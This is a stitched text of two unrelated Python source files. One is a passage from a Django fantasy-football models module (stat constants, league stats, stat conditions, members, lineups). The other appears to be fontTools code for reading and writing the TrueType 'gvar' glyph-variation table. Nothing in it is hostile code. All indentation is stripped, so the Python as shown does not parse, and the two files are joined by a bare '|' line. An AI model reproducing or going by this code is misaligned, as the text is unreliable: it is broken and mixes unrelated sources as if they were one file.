KICKING_FGM = 'kicking_fgm'
KICKING_FGM_YDS = 'kicking_fgm_yds'
KICKING_FGMISSED = 'kicking_fgmissed'
KICKING_FGMISSED_YDS = 'kicking_fgmissed_yds'
KICKING_I20 = 'kicking_i20'
KICKING_REC = 'kicking_rec'
KICKING_REC_TDS = 'kicking_rec_tds'
KICKING_TOT = 'kicking_tot'
KICKING_TOUCHBACK = 'kicking_touchback'
KICKING_XPA = 'kicking_xpa'
KICKING_XPB = 'kicking_xpb'
KICKING_XPMADE = 'kicking_xpmade'
KICKING_XPMISSED = 'kicking_xpmissed'
KICKING_YDS = 'kicking_yds'
KICKRET_FAIR = 'kickret_fair'
KICKRET_OOB = 'kickret_oob'
KICKRET_RET = 'kickret_ret'
KICKRET_TDS = 'kickret_tds'
KICKRET_TOUCHBACK = 'kickret_touchback'
KICKRET_YDS = 'kickret_yds'
PASSING_ATT = 'passing_att'
PASSING_CMP = 'passing_cmp'
PASSING_CMP_AIR_YDS = 'passing_cmp_air_yds'
PASSING_FIRST_DOWN = 'passing_first_down'
PASSING_INCMP = 'passing_incmp'
PASSING_INCMP_AIR_YDS = 'passing_incmp_air_yds'
PASSING_INT = 'passing_int'
PASSING_SK = 'passing_sk'
PASSING_SK_YDS = 'passing_sk_yds'
PASSING_TDS = 'passing_tds'
PASSING_TWOPTA = 'passing_twopta'
PASSING_TWOPTM = 'passing_twoptm'
PASSING_TWOPTMISSED = 'passing_twoptmissed'
PASSING_YDS = 'passing_yds'
PENALTY = 'penalty'
PENALTY_FIRST_DOWN = 'penalty_first_down'
PENALTY_YDS = 'penalty_yds'
PUNTING_BLK = 'punting_blk'
PUNTING_I20 = 'punting_i20'
PUNTING_TOT = 'punting_tot'
PUNTING_TOUCHBACK = 'punting_touchback'
PUNTING_YDS = 'punting_yds'
PUNTRET_DOWNED = 'puntret_downed'
PUNTRET_FAIR = 'puntret_fair'
PUNTRET_OOB = 'puntret_oob'
PUNTRET_TDS = 'puntret_tds'
PUNTRET_TOT = 'puntret_tot'
PUNTRET_TOUCHBACK = 'puntret_touchback'
PUNTRET_YDS = 'puntret_yds'
RECEIVING_REC = 'receiving_rec'
RECEIVING_TAR = 'receiving_tar'
RECEIVING_TDS = 'receiving_tds'
RECEIVING_TWOPTA = 'receiving_twopta'
RECEIVING_TWOPTM = 'receiving_twoptm'
RECEIVING_TWOPTMISSED = 'receiving_twoptmissed'
RECEIVING_YAC_YDS = 'receiving_yac_yds'
RECEIVING_YDS = 'receiving_yds'
RUSHING_ATT = 'rushing_att'
RUSHING_FIRST_DOWN = 'rushing_first_down'
RUSHING_LOSS = 'rushing_loss'
RUSHING_LOSS_YDS = 'rushing_loss_yds'
RUSHING_TDS = 'rushing_tds'
RUSHING_TWOPTA = 'rushing_twopta'
RUSHING_TWOPTM = 'rushing_twoptm'
RUSHING_TWOPTMISSED = 'rushing_twoptmissed'
RUSHING_YDS = 'rushing_yds'
THIRD_DOWN_ATT = 'third_down_att'
THIRD_DOWN_CONV = 'third_down_conv'
THIRD_DOWN_FAILED = 'third_down_failed'
TIMEOUT = 'timeout'
XP_ABORTED = 'xp_aborted'
class LeagueStat(models.Model):
league = models.ForeignKey(League, on_delete=models.CASCADE)
name = models.TextField()
field = models.CharField(max_length=21, choices=StatField.choices)
# when true, look for conditions in StatCondition
conditions = models.BooleanField(default=False)
# used for calculating scores
multiplier = models.DecimalField(max_digits=10, decimal_places=2, default=0)
def __repr__(self):
return (f"{{'model': 'LeagueStat', 'league': '{self.league.name}', 'name': "
f"'{self.name}'}}")
def __str__(self):
return f"{{Stat '{self.name}' from League '{self.league.name}'}}"
def __eq__(self, other):
if isinstance(other, LeagueStat):
return (self.league == other.league and self.name == other.name)
else:
return NotImplemented
def __hash__(self):
return hash(('LeagueStat', self.league, self.name))
class StatCondition(models.Model):
class Comparison(models.TextChoices):
EQ = '='
GT = '>'
LT = '<'
GTE = '>='
LTE = '<='
league_stat = models.ForeignKey(LeagueStat, on_delete=models.CASCADE)
field = models.CharField(max_length=21, choices=StatField.choices)
comparison = models.CharField(max_length=2, choices=Comparison.choices)
value = models.SmallIntegerField(default=0)
def __repr__(self):
return (f"{{'model': 'StatCondition', 'league': "
f"'{self.league_stat.league.name}', 'stat': '{self.league_stat.name}', "
f"'field': '{self.field}', 'comparison': '{self.comparison}', "
f"'value': {self.value}}}")
def __str__(self):
return (f"{{Condition {self.field}{self.comparison}{self.value} for "
f"'{self.league_stat.name}' in League '{self.league_stat.league.name}'}}")
def __eq__(self, other):
if isinstance(other, StatCondition):
return (self.league_stat == other.league_stat and self.field == other.field
and self.comparison == other.comparison and self.value == other.value)
else:
return NotImplemented
def __hash__(self):
return hash(('StatCondition', self.league_stat, self.field, self.comparison,
self.value))
class Member(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
league = models.ForeignKey(League, on_delete=models.CASCADE)
admin = models.BooleanField(default=False)
def __repr__(self):
return (f"{{'model': 'Member', 'username': '{self.user.username}', 'league': "
f"'{self.league.name}'}}")
def __str__(self):
return f"{{User '{self.user.username}' in League '{self.league.name}'}}"
def __eq__(self, other):
if isinstance(other, Member):
return (self.user.username == other.user.username and self.league ==
other.league)
else:
return NotImplemented
def __hash__(self):
return hash(('Member', self.user.username, self.league))
def is_admin(self):
return self.admin
def get_lineup(self, season_type='', season_year='', week=''):
if not season_type or not season_year or not week:
season_year, season_type, week = get_current_week()
lineup_entries = Lineup.objects.filter(member=self, season_type=season_type,
season_year=season_year, week=week).order_by('player__position')
return [entry.player.data_dict() for entry in lineup_entries]
def lineup_delete(self, player_id, season_type='', season_year='', week=''):
if not season_type or not season_year or not week:
season_year, season_type, week = get_current_week()
row = Lineup.objects.filter(member=self, season_type=season_type,
season_year=season_year, week=week, player_id=player_id)
if len(row) == 1:
row[0].delete()
def lineup_add(self, player_id, season_type='', season_year='', week=''):
if not season_type or not season_year or not week:
season_year, season_type, week = get_current_week()
Lineup.objects.create(member=self, season_type=season_type,
season_year=season_year, week=week, player_id=player_id)
class Lineup(models.Model):
member = models.ForeignKey(Member, on_delete=models.CASCADE)
season_year = models.SmallIntegerField()
season_type = models.CharField(max_length=4, choices=SeasonType.choices)
week = models.SmallIntegerField()
player = models.ForeignKey(Player, on_delete=models.CASCADE)
def __repr__(self):
return (f"{{'model': 'Lineup', 'user': '{self.member.user.username}', "
f"'league': '{self.member.league.name}', 'season_year': {self.season_year}, "
f"'season_type': '{self.season_type}', 'week': {self.week}, "
f"'player_id': '{self.player.player_id}'}}")
def __str__(self):
return (f"{{Player '{self.player.player_id}' for User '{self.member.user.username}' "
f"in League '{self.member.league.name}' for '{self.season_type}' "
f"{self.season_year} week {self.week}}}")
def __eq__(self, other):
if isinstance(other, Lineup):
return (self.member == other.member and self.season_year ==
other.season_year and self.season_type == other.season_type and
self.week == other.week and self.player == other.player)
else:
return NotImplemented
def __hash__(self):
return hash(('Lineup', self.member, self.season_year, self.season_type,
self.week, self.player))
|
from __future__ import print_function, division, absolute_import
from fontTools.misc.py23 import *
from fontTools import ttLib
from fontTools.misc import sstruct
from fontTools.misc.fixedTools import fixedToFloat, floatToFixed
from fontTools.misc.textTools import safeEval
from fontTools.ttLib import TTLibError
from . import DefaultTable
import array
import io
import sys
import struct
import logging
log = logging.getLogger(__name__)
# Apple's documentation of 'gvar':
# https://developer.apple.com/fonts/TrueType-Reference-Manual/RM06/Chap6gvar.html
#
# FreeType2 source code for parsing 'gvar':
# http://git.savannah.gnu.org/cgit/freetype/freetype2.git/tree/src/truetype/ttgxvar.c
GVAR_HEADER_FORMAT = """
> # big endian
version: H
reserved: H
axisCount: H
sharedCoordCount: H
offsetToCoord: I
glyphCount: H
flags: H
offsetToData: I
"""
GVAR_HEADER_SIZE = sstruct.calcsize(GVAR_HEADER_FORMAT)
TUPLES_SHARE_POINT_NUMBERS = 0x8000
TUPLE_COUNT_MASK = 0x0fff
EMBEDDED_TUPLE_COORD = 0x8000
INTERMEDIATE_TUPLE = 0x4000
PRIVATE_POINT_NUMBERS = 0x2000
TUPLE_INDEX_MASK = 0x0fff
DELTAS_ARE_ZERO = 0x80
DELTAS_ARE_WORDS = 0x40
DELTA_RUN_COUNT_MASK = 0x3f
POINTS_ARE_WORDS = 0x80
POINT_RUN_COUNT_MASK = 0x7f
class table__g_v_a_r(DefaultTable.DefaultTable):
dependencies = ["fvar", "glyf"]
def compile(self, ttFont):
axisTags = [axis.axisTag for axis in ttFont["fvar"].axes]
sharedCoords = self.compileSharedCoords_(axisTags)
sharedCoordIndices = {coord:i for i, coord in enumerate(sharedCoords)}
sharedCoordSize = sum([len(c) for c in sharedCoords])
compiledGlyphs = self.compileGlyphs_(ttFont, axisTags, sharedCoordIndices)
offset = 0
offsets = []
for glyph in compiledGlyphs:
offsets.append(offset)
offset += len(glyph)
offsets.append(offset)
compiledOffsets, tableFormat = self.compileOffsets_(offsets)
header = {}
header["version"] = self.version
header["reserved"] = self.reserved
header["axisCount"] = len(axisTags)
header["sharedCoordCount"] = len(sharedCoords)
header["offsetToCoord"] = GVAR_HEADER_SIZE + len(compiledOffsets)
header["glyphCount"] = len(compiledGlyphs)
header["flags"] = tableFormat
header["offsetToData"] = header["offsetToCoord"] + sharedCoordSize
compiledHeader = sstruct.pack(GVAR_HEADER_FORMAT, header)
result = [compiledHeader, compiledOffsets]
result.extend(sharedCoords)
result.extend(compiledGlyphs)
return bytesjoin(result)
def compileSharedCoords_(self, axisTags):
coordCount = {}
for variations in self.variations.values():
for gvar in variations:
coord = gvar.compileCoord(axisTags)
coordCount[coord] = coordCount.get(coord, 0) + 1
sharedCoords = [(count, coord) for (coord, count) in coordCount.items() if count > 1]
sharedCoords.sort(reverse=True)
MAX_NUM_SHARED_COORDS = TUPLE_INDEX_MASK + 1
sharedCoords = sharedCoords[:MAX_NUM_SHARED_COORDS]
return [c[1] for c in sharedCoords] # Strip off counts.
def compileGlyphs_(self, ttFont, axisTags, sharedCoordIndices):
result = []
for glyphName in ttFont.getGlyphOrder():
glyph = ttFont["glyf"][glyphName]
numPointsInGlyph = self.getNumPoints_(glyph)
result.append(self.compileGlyph_(glyphName, numPointsInGlyph, axisTags, sharedCoordIndices))
return result
def compileGlyph_(self, glyphName, numPointsInGlyph, axisTags, sharedCoordIndices):
variations = self.variations.get(glyphName, [])
variations = [v for v in variations if v.hasImpact()]
if len(variations) == 0:
return b""
# Each glyph variation tuples modifies a set of control points. To indicate
# which exact points are getting modified, a single tuple can either refer
# to a shared set of points, or the tuple can supply its private point numbers.
# Because the impact of sharing can be positive (no need for a private point list)
# or negative (need to supply 0,0 deltas for unused points), it is not obvious
# how to determine which tuples should take their points from the shared
# pool versus have their own. Perhaps we should resort to brute force,
# and try all combinations? However, if a glyph has n variation tuples,
# we would need to try 2^n combinations (because each tuple may or may not
# be part of the shared set). How many variations tuples do glyphs have?
#
# Skia.ttf: {3: 1, 5: 11, 6: 41, 7: 62, 8: 387, 13: 1, 14: 3}
# JamRegular.ttf: {3: 13, 4: 122, 5: 1, 7: 4, 8: 1, 9: 1, 10: 1}
# BuffaloGalRegular.ttf: {1: 16, 2: 13, 4: 2, 5: 4, 6: 19, 7: 1, 8: 3, 9: 18}
# (Reading example: In Skia.ttf, 41 glyphs have 6 variation tuples).
#
# Is this even worth optimizing? If we never use a shared point list,
# the private lists will consume 112K for Skia, 5K for BuffaloGalRegular,
# and 15K for JamRegular. If we always use a shared point list,
# the shared lists will consume 16K for Skia, 3K for BuffaloGalRegular,
# and 10K for JamRegular. However, in the latter case the delta arrays
# will become larger, but I haven't yet measured by how much. From
# gut feeling (which may be wrong), the optimum is to share some but
# not all points; however, then we would need to try all combinations.
#
# For the time being, we try two variants and then pick the better one:
# (a) each tuple supplies its own private set of points;
# (b) all tuples refer to a shared set of points, which consists of
# "every control point in the glyph".
allPoints = set(range(numPointsInGlyph))
tuples = []
data = []
someTuplesSharePoints = False
for gvar in variations:
privateTuple, privateData = gvar.compile(axisTags, sharedCoordIndices, sharedPoints=None)
sharedTuple, sharedData = gvar.compile(axisTags, sharedCoordIndices, sharedPoints=allPoints)
# TODO: If we use shared points, Apple MacOS X 10.9.5 cannot display our fonts.
# This is probably a problem with our code; find the problem and fix it.
#if (len(sharedTuple) + len(sharedData)) < (len(privateTuple) + len(privateData)):
if False:
tuples.append(sharedTuple)
data.append(sharedData)
someTuplesSharePoints = True
else:
tuples.append(privateTuple)
data.append(privateData)
if someTuplesSharePoints:
data = bytechr(0) + bytesjoin(data) # 0x00 = "all points in glyph"
tupleCount = TUPLES_SHARE_POINT_NUMBERS | len(tuples)
else:
data = bytesjoin(data)
tupleCount = len(tuples)
tuples = bytesjoin(tuples)
result = struct.pack(">HH", tupleCount, 4 + len(tuples)) + tuples + data
if len(result) % 2 != 0:
result = result + b"\0" # padding
return result
def decompile(self, data, ttFont):
axisTags = [axis.axisTag for axis in ttFont["fvar"].axes]
glyphs = ttFont.getGlyphOrder()
sstruct.unpack(GVAR_HEADER_FORMAT, data[0:GVAR_HEADER_SIZE], self)
assert len(glyphs) == self.glyphCount
assert len(axisTags) == self.axisCount
offsets = self.decompileOffsets_(data[GVAR_HEADER_SIZE:], tableFormat=(self.flags & 1), glyphCount=self.glyphCount)
sharedCoords = self.decompileSharedCoords_(axisTags, data)
self.variations = {}
for i in range(self.glyphCount):
glyphName = glyphs[i]
glyph = ttFont["glyf"][glyphName]
numPointsInGlyph = self.getNumPoints_(glyph)
gvarData = data[self.offsetToData + offsets[i] : self.offsetToData + offsets[i + 1]]
self.variations[glyphName] = \
self.decompileGlyph_(numPointsInGlyph, sharedCoords, axisTags, gvarData)
def decompileSharedCoords_(self, axisTags, data):
result, _pos = GlyphVariation.decompileCoords_(axisTags, self.sharedCoordCount, data, self.offsetToCoord)
return result
@staticmethod
def decompileOffsets_(data, tableFormat, glyphCount):
if tableFormat == 0:
# Short format: array of UInt16
offsets = array.array("H")
offsetsSize = (glyphCount + 1) * 2
else:
# Long format: array of UInt32
offsets = array.array("I")
offsetsSize = (glyphCount + 1) * 4
offsets.fromstring(data[0 : offsetsSize])
if sys.byteorder != "big":
offsets.byteswap()
# In the short format, offsets need to be multiplied by 2.
# This is not documented in Apple's TrueType specification,
# but can be inferred from the FreeType implementation, and
# we could verify it with two sample GX fonts.
if tableFormat == 0:
offsets = [off * 2 for off in offsets]
return offsets
@staticmethod
def compileOffsets_(offsets):
"""Packs a list of offsets into a 'gvar' offset table.
Returns a pair (bytestring, tableFormat). Bytestring is the
packed offset table. Format indicates whether the table
uses short (tableFormat=0) or long (tableFormat=1) integers.
The returned tableFormat should get packed into the flags field
of the 'gvar' header.
"""
assert len(offsets) >= 2
for i in range(1, len(offsets)):
assert offsets[i - 1] <= offsets[i]
if max(offsets) <= 0xffff * 2:
packed = array.array("H", [n >> 1 for n in offsets])
tableFormat = 0
else:
packed = array.array("I", offsets)
tableFormat = 1
if sys.byteorder != "big":
packed.byteswap()
return (packed.tostring(), tableFormat)
def decompileGlyph_(self, numPointsInGlyph, sharedCoords, axisTags, data):
if len(data) < 4:
return []
numAxes = len(axisTags)
tuples = []
flags, offsetToData = struct.unpack(">HH", data[:4])
pos = 4
dataPos = offsetToData
if (flags & TUPLES_SHARE_POINT_NUMBERS) != 0:
sharedPoints, dataPos = GlyphVariation.decompilePoints_(numPointsInGlyph, data, dataPos)
else:
sharedPoints = []
for _ in range(flags & TUPLE_COUNT_MASK):
dataSize, flags = struct.unpack(">HH", data[pos:pos+4])
tupleSize = GlyphVariation.getTupleSize_(flags, numAxes)
tupleData = data[pos : pos + tupleSize]
pointDeltaData = data[dataPos : dataPos + dataSize]
tuples.append(self.decompileTuple_(numPointsInGlyph, sharedCoords, sharedPoints, axisTags, tupleData, pointDeltaData))
pos += tupleSize
dataPos += dataSize
return tuples
@staticmethod
def decompileTuple_(numPointsInGlyph, sharedCoords, sharedPoints, axisTags, data, tupleData):
flags = struct.unpack(">H", data[2:4])[0]
pos = 4
if (flags & EMBEDDED_TUPLE_COORD) == 0:
coord = sharedCoords[flags & TUPLE_INDEX_MASK]
else:
coord, pos = GlyphVariation.decompileCoord_(axisTags, data, pos)
if (flags & INTERMEDIATE_TUPLE) != 0:
minCoord, pos = GlyphVariation.decompileCoord_(axisTags, data, pos)
maxCoord, pos = GlyphVariation.decompileCoord_(axisTags, data, pos)
else:
minCoord, maxCoord = table__g_v_a_r.computeMinMaxCoord_(coord)
axes = {}
for axis in axisTags:
coords = minCoord[axis], coord[axis], maxCoord[axis]
if coords != (0.0, 0.0, 0.0):
axes[axis] = coords
pos = 0
if (flags & PRIVATE_POINT_NUMBERS) != 0:
points, pos = GlyphVariation.decompilePoints_(numPointsInGlyph, tupleData, pos)
else:
points = sharedPoints
deltas_x, pos = GlyphVariation.decompileDeltas_(len(points), tupleData, pos)
deltas_y, pos = GlyphVariation.decompileDeltas_(len(points), tupleData, pos)
deltas = [None] * numPointsInGlyph
for p, x, y in zip(points, deltas_x, deltas_y):
if 0 <= p < numPointsInGlyph:
deltas[p] = (x, y)
return GlyphVariation(axes, deltas)
@staticmethod
def computeMinMaxCoord_(coord):
minCoord = {}
maxCoord = {}
for (axis, value) in coord.items():
minCoord[axis] = min(value, 0.0) # -0.3 --> -0.3; 0.7 --> 0.0
maxCoord[axis] = max(value, 0.0) # -0.3 --> 0.0; 0.7 --> 0.7
return (minCoord, maxCoord)
def toXML(self, writer, ttFont, progress=None):
writer.simpletag("version", value=self.version)
writer.newline()
writer.simpletag("reserved", value=self.reserved)
writer.newline()
axisTags = [axis.axisTag for axis in ttFont["fvar"].axes]
for glyphName in ttFont.getGlyphOrder():
variations = self.variations.get(glyphName)
if not variations:
continue
writer.begintag("glyphVariations", glyph=glyphName)
writer.newline()
for gvar in variations:
gvar.toXML(writer, axisTags)
writer.endtag("glyphVariations")
writer.newline()
def fromXML(self, name, attrs, content, ttFont):
if name == "version":
self.version = safeEval(attrs["value"])
elif name == "reserved":
self.reserved = safeEval(attrs["value"])
elif name == "glyphVariations":
if not hasattr(self, "variations"):
self.variations = {}
glyphName = attrs["glyph"]
glyph = ttFont["glyf"][glyphName]
numPointsInGlyph = self.getNumPoints_(glyph)
glyphVariations = []
for element in content:
if isinstance(element, tuple):
name, attrs, content = element
if name == "tuple":
gvar = GlyphVariation({}, [None] * numPointsInGlyph)
glyphVariations.append(gvar)
for tupleElement in content:
if isinstance(tupleElement, tuple):
tupleName, tupleAttrs, tupleContent = tupleElement
gvar.fromXML(tupleName, tupleAttrs, tupleContent)
self.variations[glyphName] = glyphVariations
@staticmethod
def getNumPoints_(glyph):
NUM_PHANTOM_POINTS = 4
if glyph.isComposite():
return len(glyph.components) + NUM_PHANTOM_POINTS
else:
# Empty glyphs (eg. space, nonmarkingreturn) have no "coordinates" attribute.
return len(getattr(glyph, "coordinates", [])) + NUM_PHANTOM_POINTS
class GlyphVariation(object):
def __init__(self, axes, coordinates):
self.axes = axes
self.coordinates = coordinates
def __repr__(self):
axes = ",".join(sorted(["%s=%s" % (name, value) for (name, value) in self.axes.items()]))
return "<GlyphVariation %s %s>" % (axes, self.coordinates)
def __eq__(self, other):
return self.coordinates == other.coordinates and self.axes == other.axes
def getUsedPoints(self):
result = set()
for i, point in enumerate(self.coordinates):
if point is not None:
result.add(i)
return result
def hasImpact(self):
"""Returns True if this GlyphVariation has any visible impact.
If the result is False, the GlyphVariation can be omitted from the font
without making any visible difference.
"""
for c in self.coordinates:
if c is not None:
return True
return False
def toXML(self, writer, axisTags):
writer.begintag("tuple")
writer.newline()
for axis in axisTags:
value = self.axes.get(axis)
if value is not None:
minValue, value, maxValue = value
defaultMinValue = min(value, 0.0) # -0.3 --> -0.3; 0.7 --> 0.0
defaultMaxValue = max(value, 0.0) # -0.3 --> 0.0; 0.7 --> 0.7
if minValue == defaultMinValue and maxValue == defaultMaxValue:
writer.simpletag("coord", axis=axis, value=value)
else:
writer.simpletag("coord", axis=axis, value=value, min=minValue, max=maxValue)
writer.newline()
wrote_any_points = False
for i, point in enumerate(self.coordinates):
if point is not None:
writer.simpletag("delta", pt=i, x=point[0], y=point[1])
writer.newline()
wrote_any_points = True
if not wrote_any_points:
writer.comment("no deltas")
writer.newline()
writer.endtag("tuple")
writer.newline()
def fromXML(self, name, attrs, _content):
if name == "coord":
axis = attrs["axis"]
value = float(attrs["value"])
defaultMinValue = min(value, 0.0) # -0.3 --> -0.3; 0.7 --> 0.0
defaultMaxValue = max(value, 0.0) # -0.3 --> 0.0; 0.7 --> 0.7
minValue = float(attrs.get("min", defaultMinValue))
maxValue = float(attrs.get("max", defaultMaxValue))
self.axes[axis] = (minValue, value, maxValue)
elif name == "delta":
point = safeEval(attrs["pt"])
x = safeEval(attrs["x"])
y = safeEval(attrs["y"])
self.coordinates[point] = (x, y)
def compile(self, axisTags, sharedCoordIndices, sharedPoints):
tupleData = []
assert all(tag in axisTags for tag in self.axes.keys()), ("Unknown axis tag found.", self.axes.keys(), axisTags)
coord = self.compileCoord(axisTags)
if coord in sharedCoordIndices:
flags = sharedCoordIndices[coord]
else:
flags = EMBEDDED_TUPLE_COORD
tupleData.append(coord)
intermediateCoord = self.compileIntermediateCoord(axisTags)
if intermediateCoord is not None:
flags |= INTERMEDIATE_TUPLE
tupleData.append(intermediateCoord)
if sharedPoints is not None:
auxData = self.compileDeltas(sharedPoints)
else:
flags |= PRIVATE_POINT_NUMBERS
points = self.getUsedPoints()
numPointsInGlyph = len(self.coordinates)
auxData = self.compilePoints(points, numPointsInGlyph) + self.compileDeltas(points)
tupleData = struct.pack('>HH', len(auxData), flags) + bytesjoin(tupleData)
return (tupleData, auxData)
def compileCoord(self, axisTags):
result = []
for axis in axisTags:
_minValue, value, _maxValue = self.axes.get(axis, (0.0, 0.0, 0.0))
result.append(struct.pack(">h", floatToFixed(value, 14)))
return bytesjoin(result)
def compileIntermediateCoord(self, axisTags):
needed = False
for axis in axisTags:
minValue, value, maxValue = self.axes.get(axis, (0.0, 0.0, 0.0))
defaultMinValue = min(value, 0.0) # -0.3 --> -0.3; 0.7 --> 0.0
defaultMaxValue = max(value, 0.0) # -0.3 --> 0.0; 0.7 --> 0.7
if (minValue != defaultMinValue) or (maxValue != defaultMaxValue):
needed = True
break
if not needed:
return None
minCoords = []
maxCoords = []
for axis in axisTags:
minValue, value, maxValue = self.axes.get(axis, (0.0, 0.0, 0.0))
minCoords.append(struct.pack(">h", floatToFixed(minValue, 14)))
maxCoords.append(struct.pack(">h", floatToFixed(maxValue, 14)))
return bytesjoin(minCoords + maxCoords)
@staticmethod
def decompileCoord_(axisTags, data, offset):
coord = {}
pos = offset
for axis in axisTags:
coord[axis] = fixedToFloat(struct.unpack(">h", data[pos:pos+2])[0], 14)
pos += 2
return coord, pos
@staticmethod
def decompileCoords_(axisTags, numCoords, data, offset):
result = []
pos = offset
for _ in range(numCoords):
coord, pos = GlyphVariation.decompileCoord_(axisTags, data, pos)
result.append(coord)
return result, pos
@staticmethod
def compilePoints(points, numPointsInGlyph):
# If the set consists of all points in the glyph, it gets encoded with
# a special encoding: a single zero byte.
if len(points) == numPointsInGlyph:
return b"\0"
# In the 'gvar' table, the packing of point numbers is a little surprising.
# It consists of multiple runs, each being a delta-encoded list of integers.
# For example, the point set {17, 18, 19, 20, 21, 22, 23} gets encoded as
# [6, 17, 1, 1, 1, 1, 1, 1]. The first value (6) is the run length minus 1.
# There are two types of runs, with values being either 8 or 16 bit unsigned
# integers.
points = list(points)
points.sort()
numPoints = len(points)
# The binary representation starts with the total number of points in the set,
# encoded into one or two bytes depending on the value.
if numPoints < 0x80:
result = [bytechr(numPoints)]
else:
result = [bytechr((numPoints >> 8) | 0x80) + bytechr(numPoints & 0xff)]
MAX_RUN_LENGTH = 127
pos = 0
lastValue = 0
while pos < numPoints:
run = io.BytesIO()
runLength = 0
useByteEncoding = None
while pos < numPoints and runLength <= MAX_RUN_LENGTH:
curValue = points[pos]
delta = curValue - lastValue
if useByteEncoding is None:
useByteEncoding = 0 <= delta <= 0xff
if useByteEncoding and (delta > 0xff or delta < 0):
# we need to start a new run (which will not use byte encoding)
break
# TODO This never switches back to a byte-encoding from a short-encoding.
# That's suboptimal.
if useByteEncoding:
run.write(bytechr(delta))
else:
run.write(bytechr(delta >> 8))
run.write(bytechr(delta & 0xff))
lastValue = curValue
pos += 1
runLength += 1
if useByteEncoding:
runHeader = bytechr(runLength - 1)
else:
runHeader = bytechr((runLength - 1) | POINTS_ARE_WORDS)
result.append(runHeader)
result.append(run.getvalue())
return bytesjoin(result)
@staticmethod
def decompilePoints_(numPointsInGlyph, data, offset):
"""(numPointsInGlyph, data, offset) --> ([point1, point2, ...], newOffset)"""
pos = offset
numPointsInData = byteord(data[pos])
pos += 1
if (numPointsInData & POINTS_ARE_WORDS) != 0:
numPointsInData = (numPointsInData & POINT_RUN_COUNT_MASK) << 8 | byteord(data[pos])
pos += 1
if numPointsInData == 0:
return (range(numPointsInGlyph), pos)
result = []
while len(result) < numPointsInData:
runHeader = byteord(data[pos])
pos += 1
numPointsInRun = (runHeader & POINT_RUN_COUNT_MASK) + 1
point = 0
if (runHeader & POINTS_ARE_WORDS) != 0:
points = array.array("H")
pointsSize = numPointsInRun * 2
else:
points = array.array("B")
pointsSize = numPointsInRun
points.fromstring(data[pos:pos+pointsSize])
if sys.byteorder != "big":
points.byteswap()
assert len(points) == numPointsInRun
pos += pointsSize
result.extend(points)
# Convert relative to absolute
absolute = []
current = 0
for delta in result:
current += delta
absolute.append(current)
result = absolute
del absolute
if max(result) >= numPointsInGlyph or min(result) < 0:
log.warning("point number out of range in 'gvar' table")
return (result, pos)
def compileDeltas(self, points):
deltaX = []
deltaY = []
for p in sorted(list(points)):
c = self.coordinates[p]
if c is not None:
deltaX.append(c[0])
deltaY.append(c[1])
return self.compileDeltaValues_(deltaX) + self.compileDeltaValues_(deltaY)
@staticmethod
def compileDeltaValues_(deltas):
"""[value1, value2, value3, ...] --> bytestring
Emits a sequence of runs. Each run starts with a
byte-sized header whose 6 least significant bits
(header & 0x3F) indicate how many values are encoded
in this run. The stored length is the actual length
minus one; run lengths are thus in the range [1..64].
If the header byte has its most significant bit (0x80)
set, all values in this run are zero, and no data
follows. Otherwise, the header byte is followed by
((header & 0x3F) + 1) signed values. If (header &
0x40) is clear, the delta values are stored as signed
bytes; if (header & 0x40) is set, the delta values are
signed 16-bit integers.
""" # Explaining the format because the 'gvar' spec is hard to understand.
stream = io.BytesIO()
pos = 0
while pos < len(deltas):
value = deltas[pos]
if value == 0:
pos = GlyphVariation.encodeDeltaRunAsZeroes_(deltas, pos, stream)
elif value >= -128 and value <= 127:
pos = GlyphVariation.encodeDeltaRunAsBytes_(deltas, pos, stream)
else:
pos = GlyphVariation.encodeDeltaRunAsWords_(deltas, pos, stream)
return stream.getvalue()
@staticmethod
def encodeDeltaRunAsZeroes_(deltas, offset, stream):
runLength = 0
pos = offset
numDeltas = len(deltas)
while pos < numDeltas and runLength < 64 and deltas[pos] == 0:
pos += 1
runLength += 1
assert runLength >= 1 and runLength <= 64
stream.write(bytechr(DELTAS_ARE_ZERO | (runLength - 1)))
return pos
@staticmethod
def encodeDeltaRunAsBytes_(deltas, offset, stream):
runLength = 0
pos = offset
numDeltas = len(deltas)
while pos < numDeltas and runLength < 64:
value = deltas[pos]
if value < -128 or value > 127:
break
# Within a byte-encoded run of deltas, a single zero
# is best stored literally as 0x00 value. However,
# if are two or more zeroes in a sequence, it is
# better to start a new run. For example, the sequence
# of deltas [15, 15, 0, 15, 15] becomes 6 bytes
# (04 0F 0F 00 0F 0F) when storing the zero value
# literally, but 7 bytes (01 0F 0F 80 01 0F 0F)
# when starting a new run.
if value == 0 and pos+1 < numDeltas and deltas[pos+1] == 0:
break
pos += 1
runLength += 1
assert runLength >= 1 and runLength <= 64
stream.write(bytechr(runLength - 1))
for i in range(offset, pos):
stream.write(struct.pack('b', deltas[i]))
return pos
@staticmethod
def encodeDeltaRunAsWords_(deltas, offset, stream):
runLength = 0
pos = offset
numDeltas = len(deltas)
while pos < numDeltas and runLength < 64:
value = deltas[pos]
# Within a word-encoded run of deltas, it is easiest
# to start a new run (with a different encoding)
# whenever we encounter a zero value. For example,
# the sequence [0x6666, 0, 0x7777] needs 7 bytes when
# storing the zero literally (42 66 66 00 00 77 77),
# and equally 7 bytes when starting a new run
# (40 66 66 80 40 77 77).
if value == 0:
break
# Within a word-encoded run of deltas, a single value
# in the range (-128..127) should be encoded literally
# because it is more compact. For example, the sequence
# [0x6666, 2, 0x7777] becomes 7 bytes when storing
# the value literally (42 66 66 00 02 77 77), but 8 bytes
# when starting a new run (40 66 66 00 02 40 77 77).
isByteEncodable = lambda value: value >= -128 and value <= 127
if isByteEncodable(value) and pos+1 < numDeltas and isByteEncodable(deltas[pos+1]):
break
pos += 1
runLength += 1
assert runLength >= 1 and runLength <= 64
stream.write(bytechr(DELTAS_ARE_WORDS | (runLength - 1)))
for i in range(offset, pos):
stream.write(struct.pack('>h', deltas[i]))
return pos
@staticmethod
def decompileDeltas_(numDeltas, data, offset):
"""(numDeltas, data, offset) --> ([delta, delta, ...], newOffset)"""
result = []
pos = offset
while len(result) < numDeltas:
runHeader = byteord(data[pos])
pos += 1
numDeltasInRun = (runHeader & DELTA_RUN_COUNT_MASK) + 1
if (runHeader & DELTAS_ARE_ZERO) != 0:
result.extend([0] * numDeltasInRun)
else:
if (runHeader & DELTAS_ARE_WORDS) != 0:
deltas = array.array("h")
deltasSize = numDeltasInRun * 2
else:
deltas = array.array("b")
deltasSize = numDeltasInRun
deltas.fromstring(data[pos:pos+deltasSize])
if sys.byteorder != "big":
deltas.byteswap()
assert len(deltas) == numDeltasInRun
pos += deltasSize
result.extend(deltas)
assert len(result) == numDeltas
